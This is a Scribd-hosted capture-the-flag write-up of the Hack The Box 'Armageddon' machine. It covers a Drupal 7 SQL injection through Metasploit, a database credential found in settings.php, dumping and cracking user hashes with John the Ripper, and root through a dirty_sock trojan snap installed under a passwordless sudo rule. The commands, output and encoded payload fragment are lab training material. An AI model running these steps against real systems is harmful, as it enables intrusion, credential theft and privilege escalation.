Scribd Logo
Upload

Welcome to Scribd!

  • Creds: 1. Database

    Uploaded by

    Nonight gams
    17 views7 pages
    This document contains credentials, Nmap scan results, and steps to exploit a Drupal 7 SQL injection vulnerability to gain initial access to the Armageddon HTB machine. It finds the password hash for the brucetherealadmin user in the Drupal database, cracks it using John the Ripper, and gets the user.txt flag. It then identifies that the user can install Snap packages using sudo without a password. The document uses a dirty_sock Python script from GitHub to install a trojan Snap package and escalate to root via a setuid binary. It then retrieves the root.txt flag.

    Original Description:

    HTB

    Original Title

    armageddon

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document contains credentials, Nmap scan results, and steps to exploit a Drupal 7 SQL injection vulnerability to gain initial access to the Armageddon HTB machine. It finds the password hash for the brucetherealadmin user in the Drupal database, cracks it using John the Ripper, and gets the user.txt flag. It then identifies that the user can install Snap packages using sudo without a password. The document uses a dirty_sock Python script from GitHub to install a trojan Snap package and escalate to root via a setuid binary. It then retrieves the root.txt flag.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    17 views7 pages

    Creds: 1. Database

    Uploaded by

    Nonight gams
    This document contains credentials, Nmap scan results, and steps to exploit a Drupal 7 SQL injection vulnerability to gain initial access to the Armageddon HTB machine. It finds the password hash for the brucetherealadmin user in the Drupal database, cracks it using John the Ripper, and gets the user.txt flag. It then identifies that the user can install Snap packages using sudo without a password. The document uses a dirty_sock Python script from GitHub to install a trojan Snap package and escalate to root via a setuid binary. It then retrieves the root.txt flag.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 7

    Creds

    1. Database
    Database-Name Username Password

    drupal drupaluser CQHEy@9M*m23gBVj

    2. User credentials
    Username hash Password P

    S
    brucetherealadmin b
    DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

    Nmap
    PORT STATE SERVICE VERSION

    22/tcp Open ssh OpenSSH 7.4 (protocol 2.0

    80/tcp Open http Apache httpd 2.4.6 CentOS PHP/5.4.16

    # Nmap 7.91 scan initiated Fri May 7 14:34:38 2021 as: nmap -sC -sV -oA
    armageddon 10.10.10.233
    Nmap scan report for armageddon.htb (10.10.10.233)
    Host is up (0.63s latency).
    Not shown: 998 closed ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
    | ssh-hostkey:
    | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
    | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
    |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
    80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
    |_http-generator: Drupal 7 (http://drupal.org)
    | http-robots.txt: 36 disallowed entries (15 shown)
    | /includes/ /misc/ /modules/ /profiles/ /scripts/
    | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
    | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
    |_/LICENSE.txt /MAINTAINERS.txt
    |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
    |_http-title: Welcome to Armageddon | Armageddon

    Service detection performed. Please report any incorrect results at


    https://nmap.org/submit/ .
    # Nmap done at Fri May 7 14:35:24 2021 -- 1 IP address (1 host up) scanned
    in 46.71 seconds

    Home page of armageddon

    Trying to create an account


    When we search for the drupal vulnerabilites or exploits we get the sql injection with
    metasploits which we are going to execute:: https://www.yeahhub.com/drupal-7
    exploitation-metasploit-framework-sql-injection/# Exploiting

    Commands
    1. msfdb run

    2. Search drupal

    We are going the use 1 exploit

    Setting the options to exploits


    Set RHOSTS and LHOST

    Run the command > exploit

    After getting session


    Navigate to the sites→dafaults and here we get settings.php we contain imp creds

    Table for drupaluser


    mysql -u drupaluser -p -D drupal -e 'show tables;'
    Enter password: CQHEy@9M*m23gBVj
    Tables_in_drupal

    [snip]

    users

    Users info
    mysql -u drupaluser -p -D drupal -e 'select name,pass from users;'
    Enter password: CQHEy@9M*m23gBVj
    name pass

    brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
    manshi $S$DHlaXDFHR7kxW6kGEqCaTeCD0vgT3SGECnM5.kV4QEaEI5Sdrl/g
    manshi2905 $S$DEiAUgeQQ8ShsE2OVMryWE4EJm5fYiiBiIZRZW73vYXN/6jNnjyk

    Cracking hash password using the


    john
    Paste the hash password in a file and named as hash

    ┌──(root 💀kali)-[/home/users/hackthebox/machine/armageddon]
    └─# john hash /home/users/Downloads/rockyou.txt

    Getting user priveleges using ssh and


    user.txt
    ┌──(root 💀kali)-[/home/manshi/hackthebox/machine/armageddon]
    └─# ssh brucetherealadmin@10.10.10.233
    brucetherealadmin@10.10.10.233's password:
    Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
    [brucetherealadmin@armageddon ~]$ ls
    user.txt
    [brucetherealadmin@armageddon ~]$ cat user.txt
    b0d748--------------------8c4d60
    [brucetherealadmin@armageddon ~]$

    First we run sudo -l to check what sudo capabilities our user has

    [brucetherealadmin@armageddon ~]$ sudo -l


    Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid,
    always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL
    PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

    User brucetherealadmin may run the following commands on armageddon:


    (root) NOPASSWD: /usr/bin/snap install *

    Get the interesting things which is snapd after searching we find a git hub page of
    dirty_sock which help us to get the root priveleges ::
    https://github.com/initstring/dirty_sock

    Checking the dirty_socky2.py we get


    trojan

    Executing trojan in user


    python2 -c 'print
    "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD///
    + "A"*4256 + "=="' | base64 -d -> leet.snap

    Getting Root.txt
    [brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode
    leet.snap
    dirty-sock 0.1 installed
    [brucetherealadmin@armageddon tmp]$ su dirty_sock
    Password: // dirty_sock
    [dirty_sock@armageddon tmp]$ sudo -i

    We trust you have received the usual lecture from the local System
    Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.


    #2) Think before you type.
    #3) With great power comes great responsibility.

    [sudo] password for dirty_sock: // dirty_sock


    [root@armageddon ~]# cat root.txt
    0efe0e--------------------897db1

    You might also like